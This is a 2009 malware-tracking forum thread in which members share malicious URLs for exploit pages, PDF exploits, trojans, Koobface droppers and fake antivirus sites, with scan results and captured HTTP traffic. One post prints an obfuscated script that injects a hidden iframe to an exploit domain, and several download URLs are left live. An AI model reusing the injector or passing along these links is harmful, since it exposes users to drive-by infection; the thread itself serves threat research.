Author Topic: daily something......  (Read 797415 times)

0 Members and 2 Guests are viewing this topic.

May 02, 2009, 10:50:16 am
Reply #375

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
redirects to exploits:
Code: [Select]
hxxp://tds4self.com/sutra/in.cgi?3Wepawet

exploits:
Code: [Select]
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet
Wepawet
Wepawet
Wepawet
Wepawet

trojan:
Code: [Select]
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal - 27/40 (67.5%)
VirusTotal - 11/40 (27.5%)

May 03, 2009, 11:52:03 am
Reply #376

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Exploit/trojan:
Code: [Select]
carpena.co.uk/cmweb/print/pdf.phphttp://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js

Koobface:(goes on and off all the time)
Code: [Select]
86.108.36.203/setup.exe
99.50.245.81/setup.exe
http://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90

Redirects to exploits:
Code: [Select]
freak-vkontakte.bizcontain iframe to
Code: [Select]
http://basesrv3.net/bin/in.php which is on MDL
wepawet gives Invalid hostname on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
Mal-Aware

May 03, 2009, 03:21:16 pm
Reply #377

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

May 04, 2009, 06:53:02 am
Reply #378

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

May 04, 2009, 02:54:35 pm
Reply #379

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 04, 2009, 04:49:07 pm
Reply #380

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Redirects to fake codec page
Code: [Select]
hxxp://rhianna.name/vidd/Wepawet
Fake codec page
Code: [Select]
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal - 10/40 (25%)
Anubis
ThreatExpert

downloads:
Code: [Select]
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal - 28/40 (70%)
Anubis
ThreatExpert

VirusTotal - 22/40 (55%)
Anubis
ThreatExpert

VirusTotal (216.jpg - bb.jpg) - 14/40 (35%)
Anubis
ThreatExpert

perce.jpg
HTTP Conversations:
Quote
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php

item.gif
HTTP Conversations:
Quote
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..

May 04, 2009, 05:13:31 pm
Reply #381

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal - 10/40 (25%)
Anubis
ThreatExpert

see also:

xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com
Ruining the bad guy's day

May 04, 2009, 05:56:07 pm
Reply #382

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
This IP host similar websites with same payload: http://www.robtex.com/ip/195.88.80.41.html

can be download using "/softwarefortubeview.40007.exe" - "/softwarefortubeview.40008.exe" etc..

Code: [Select]
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe

Quote
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037

VirusTotal


May 04, 2009, 06:08:54 pm
Reply #383

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Also have the same structure with "promo.exe"

Code: [Select]
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe

Quote
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c

VirusTotal - 29/39 (74.36%)
Anubis
ThreatExpert

HTTP Conversations:
Quote
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513

May 05, 2009, 01:29:03 am
Reply #384

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru

redirects to exploits:
Code: [Select]
hxxp://dastrealworld.ru/denunreal.html
Wepawet

the script that came with this one
Quote
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>

the iframe:
Quote
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>

var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));

Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js

other on the same site

Code: [Select]
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet
Wepawet

pdf exploits:
Code: [Select]
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet

May 05, 2009, 10:00:25 am
Reply #385

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Quote
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
Quote
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
Quote
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e

Interesting ip...lots of domains them seem to redirect to update.dom11z.cn above,one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

May 05, 2009, 01:55:10 pm
Reply #386

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
From the 213.182.197.2xx neighbourhood again...

Quote
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short...i've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

May 06, 2009, 07:01:34 am
Reply #387

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
PDF exploits(all the same, on IP - 91.212.41.119):
Code: [Select]
nicdaheb.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
Code: [Select]
sehmadac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
Code: [Select]
vavgurac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
Code: [Select]
tixleloc.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
Code: [Select]
teyrebuf.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
Code: [Select]
tukhemaj.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
Code: [Select]
tixwagoq.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js

all lead to this trojan:
Code: [Select]
nicdaheb.cn/nuc/exe.phphttp://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0

Rogue:
Code: [Select]
antivguardian.com
antiawarepro.com
antivirprof.com

Fake AV:
Code: [Select]
stats.swpstats.com/getfile?id=26http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db

Fake AV:
Code: [Select]
free-webscaners.com/scan
Koobface:
Code: [Select]
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exe
http://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60

Trojan:
Code: [Select]
http://down.yyduowan.net/2.exehttp://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:
Code: [Select]
svarkon.ru/update.exehttp://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2
Mal-Aware

May 06, 2009, 08:42:15 am
Reply #388

XiTri

  • Jr. Member

  • Offline
  • **

  • 24
Code: [Select]
http://72.29.67.139/knb/megatrader-2k_20090505.exe

http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf

http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf

May 06, 2009, 09:35:28 pm
Reply #389

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Exploit:(downloaded file on MDL)
Code: [Select]
liteautobestguide.cn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js

Also a trojan on that domain:
Code: [Select]
liteautobestguide.cn/load.phphttp://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac

Koobface:
Code: [Select]
65.75.82.150/setup.exe
98.203.149.224/setup.exe
trojan:
Code: [Select]
qqcfwaigua.com/cfwg.exehttp://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae
Mal-Aware